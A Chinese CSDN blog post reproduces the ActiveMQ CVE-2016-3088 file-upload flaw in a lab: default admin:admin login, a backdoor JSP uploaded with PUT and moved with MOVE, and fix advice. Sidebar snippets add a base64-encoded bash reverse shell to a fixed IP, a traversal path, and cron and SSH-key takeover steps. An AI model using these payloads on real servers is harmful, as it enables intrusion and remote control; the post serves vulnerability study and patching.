【CVE-2016-3088】 Activemq文件上传以及弱口令

最新推荐文章于 2024-02-20 15:39:02 发布
最新推荐文章于 2024-02-20 15:39:02 发布
阅读量6.4k 收藏 2
点赞数
分类专栏: 漏洞复现 文章标签: 网络 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Lazy_ass/article/details/121532797
版权

CVE-2016-3088 PUT方法上传文件(自建环境)

漏洞描述:
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会的一套开源的消息中间件
Apache ActiveMQ 5.14.0之前5.x版本的Fileserver Web应用中存在安全漏洞。远程攻击者可通过发送HTTP PUT和HTTP MOVE请求利用该漏洞上传并执行任意文件
漏洞复现流程
1: 首先需要判断/fileserver目录是否具有访问权限
2: 访问/admin/test/systemProperties.jsp文件;需要登录尝试弱口令admin:admin登录
3: 使用put方法将后门文件进行上传
4: 使用move方法将上传文件进行移动
5: 访问我们的上传移动后的文件
漏洞复现
一: 访问 /fileserver/

在这里插入图片描述

二: 访问/admin/test/systemProperties.jsp文件并且找到activemq的家目录<访问admin目录下的文件需要进行登录;可以尝试弱口令admin:admin (如果不是弱口令只能猜测他的目录)>

在这里插入图片描述

找到activemq.home的家目录: /opt/activemq

三: PUT方法将文件进行上传

在这里插入图片描述
登录服务器可以发现我们的文件已经上传成功
在这里插入图片描述

四: 将上传成功的文件进行移动到可执行目录下即我们找到的activemq的家目录

在这里插入图片描述
登录服务器进行查看已经移动并且名字更正为aaa.jsp
在这里插入图片描述
进行访问我们上传的文件
成功访问到我们的上传的文件并且获得了他的IP地址
在这里插入图片描述

编写poc的进行简单验证

在这里插入图片描述

五: 漏洞修复建议
1: /fileserver 隐藏该文件或者禁止访问
2: 设置高强度密码防止弱口令爆破
3: 禁止使用PUT和MOVE方法
放羊的狗
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
解决 SSL/TLS协议信息泄露漏洞(CVE-2016-2183) ps1 文件
12-26
解决 SSL/TLS协议信息泄露漏洞(CVE-2016-2183) ps1 文件
Windows Server CVE-2016-2183 SSL/TLS协议信息泄露漏洞修复脚本
10-06
Windows Server 合规漏洞修复,修复Windows Server CVE-2016-2183 SSL/TLS协议信息泄露漏洞修复脚本,基于Windows PowerShell, 兼容Windows Server 2016/2019,防止Sweet32 生日攻击
CVE-2016-3088ActiveMQ任意文件写入漏洞)
最新发布
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
02-20 1270
该漏洞出现在 fileserver 应用中,漏洞原理是fileserver 支持写入文件(但不解析 jsp),同时支持移动文件(MOVE 请求)。所以我们只需写入一个文件,然后使用 MOVE 请求将其移动到任意位置,造成任意文件写入漏洞。
CVE-2016-8655 Linux内核提权漏洞POC
11-18
CVE-2016-8655 Linux内核提权漏洞POC
activemq漏洞合集
weixin_46626737的博客
07-02 530
{echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMTAuMjEyLzIyMzMgMD4mMQ==}|{base64,-d}|{bash,-i}" -Yp ROME 目标地址 61616。http://192.168.110.129:8161/admin/test/systemProperties.jsp查看物理路径。上传显示204,成功,但是该路径下没有解析权限,所以需要使用MOVE方法进行移动到正常的物理路径。弱口令:admin/admin/
ActiveMQ  任意文件上传 漏洞 PUT
U_U520的博客
01-10 1170
ActiveMQ Web控制台分为三个应用程序:其中admin,api和fileserver,其中admin是管理员页面,api是界面,fileserver是用于存储文件的界面;是消息队列的容器,专注于高并发的环境,比如天猫淘宝一秒钟上亿请求,就好比是水池,把大量短时间无法处理的数据,冗余囤积到ActiveMQ里,再分门别类,按类专门处理,从而提高处理效率。方法1 PUT /fileserver/a../../%08/..%08/.%08/%08。注意: 返回包必须是204 才能证明执行成功。
ActiveMQ漏洞总结
qq_42176207的博客
05-08 7543
ActiveMQ Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。随着中间件的启动,会打开两个端口,61616是工作端口,消息在这个端口进行传递;8161是Web管理页面端口。 Jetty 是一个开源的 servlet 容器,它为基于 Java 的 web 容器,例如 JSP 和 servlet 提供运行环境。ActiveMQ 5.0 及以后版本默认集成了jetty。在启动后提供一个监控 Ac
Apache ActiveMQ Console 存在默认弱口令
众生度尽,方证菩提
05-08 1229
这个世界并不是掌握在那些嘲笑者的手中,而恰恰掌握在能够经受得住嘲笑与批评仍不断往前走的人手中。
activeMQ修改默认账户名和密码、默认端口
u010448530的博客
11-29 2778
1、针对未授权访问,修改conf/jetty.xml文件,bean id为securityConstraint下的authenticate修改值为true,重启服务即可(高版本基本都已设置为true) 2、针对弱口令问题,修改conf/jetty.xml文件,bean id 为securityLoginService下的conf值获取用户properties,修改用户名密码,重启服务即可 3、...
ActiveMQ 任意文件上传漏洞复现
YJ_12340的博客
08-30 647
​ 访问 http://ip:8161/admin/ 进入admin登陆页面,使用弱口令登陆,账号密码皆为 admin,登陆成功后,headers中会出现验证信息。​ 将GET协议修改为PUT协议,将文件上传至 fileserver 目录下。​ 同样的,响应包返回的状态码为 204,代表文件成功移动到 api 目录下。​ 继续修改请求包协议为 MOVE,并在头部中添加 Destination。​ 如上图,response 包中返回状态码为 204,即文件上传成功。...
[Vulhub] ActiveMQ漏洞
weixin_45605352的博客
01-10 3452
ActiveMQ 反序列化漏洞 (CVE-2015-5254) 0x00 漏洞描述 Apache ActiveMQ 是由美国 Pachitea(Apache)软件基金会开发的开源消息中间件,支持 Java 消息服务、集群、Spring 框架等。 Apache ActiveMQ 5.13.0 之前的 5.x 版本安全漏洞,该程序造成的漏洞不限制代理中可以序列化的类。远程攻击者可以制作一个特殊的序列化Java Message Service (JMS) ObjectMessage 对象,利用该漏洞执行任意代码。
Apache Tomcat后台弱口令扫描
12-11
Apache Tomcat后台弱口令扫描
CVE-2016-3720
02-22
这个项目是CVE-2016-3720 Demo,为了避免搭建环境,大佬们可以直接获取到这个资源。 相对应的分析文章是:https://blog.csdn.net/qq_36869808 可以在这篇文章看到分析的内容,感谢~当然如果非常需要这个资源,也...
ActiveMQ漏洞利用
打代码的小女孩
11-04 621
背景简述 ActiveMQweb控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。 fileserver是一个RESTful API接口,我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作,其设计目的是为了...
ActiveMQ反序列化漏洞 getshell(CVE-2015-5254)——漏洞复现
W小哥
11-10 3668
一、ActiveMQ介绍 1.1 简介 Apache的一款JAVA开源消息中间件,支持Java消息服务、集群、SpringFrameword等。属于消息队列组件。 (消息队列组件:分布式系统中的重要组件,主要解决应用耦合、异步消息、流量削峰等) 1.2 漏洞影响版本 Apache ActiveMQ < 5.13.0 之前 5.x版本 1.3 漏洞成因 漏洞没有限制在代理中序列化的类,远程攻击者可以借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行恶意代码。 1.
ActiveMQ反序列化漏洞CVE-2015-5254复现
weixin_51387754的博客
06-19 396
ActiveMQ反序列化漏洞(CVE-2015-5254)复现漏洞前言0x01 漏洞环境 漏洞前言 Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。 0x0
activemq系列漏洞复现
m0_49420271的博客
06-07 2721
vulhub中activemq系列漏洞复现
ActiveMQ简介以及安装教程
知性人 -- 的博客
06-27 831
  在介绍 ActiveMQ 之前,我们先了解一下什么是 JMS 。 什么是 JMS ?   JMS 全称:Java Message Service 中文:Java消息服务。   Java消息服务指的是两个应用程序之间进行异步通信的API,它为标准消息协议和消息服务提供了一组通用接口,包括创建、发送、读取消息等,用于支持JAVA应用程序开发。在J2EE中,当两个应用程序使用JMS进行通信时,它们之...
CVE-2016-3088
07-27
CVE-2016-3088是指ActiveMQ中的一个安全漏洞。根据引用\[1\]提供的信息,该漏洞可以导致远程命令执行。攻击者可以通过上传恶意的JSP文件并执行命令来利用此漏洞。具体的攻击步骤如下: 1. 下载vulhub中对应环境的docker-compose.yml文件,该文件包含了漏洞环境的配置信息。\[2\] 2. 将上传的文件移动到能够执行JSP文件的文件夹中,并访问目标文件以获取命令执行后返回的数据。\[3\] 3. 使用计划任务反弹的方式,对目标服务器进行PUT上传文件操作,将恶意文件上传到目标服务器。需要注意将写入文件的换行符改为0a(Linux中的换行符)。 4. 对目标文件进行MOVE协议操作,将文件移动到/etc/cron.d目录下。 5. 使用nc命令进行端口监听,等待回显即可获取命令执行的结果。 此外,还可以通过上传SSH公钥的方式,使用ssh密钥链接进入服务器内部。具体步骤如下: 1. 使用ssh-keygen命令生成密钥对,并找到生成好的公钥id_rsa.pub。 2. 上传公钥文件,并将其移动到/root/.ssh目录下,并重命名为authorized_keys。 3. 使用ssh密钥链接进入服务器内部。 为修复CVE-2016-3088漏洞,建议将ActiveMQ升级到5.14版本或更高版本。在5.14版本后,取消了fileserver应用,可以通过改写配置文件来解决该漏洞。具体操作是修改ActiveMQ根目录下conf目录下的jetty.xml文件,对fileserver行进行注释操作。\[4\] #### 引用[.reference_title] - *1* *2* [ActiveMQ远程代码执行漏洞(CVE-2016-3088)](https://blog.csdn.net/weixin_44047654/article/details/128033455)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [CVE-2016-3088](https://blog.csdn.net/weixin_52084568/article/details/129194108)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值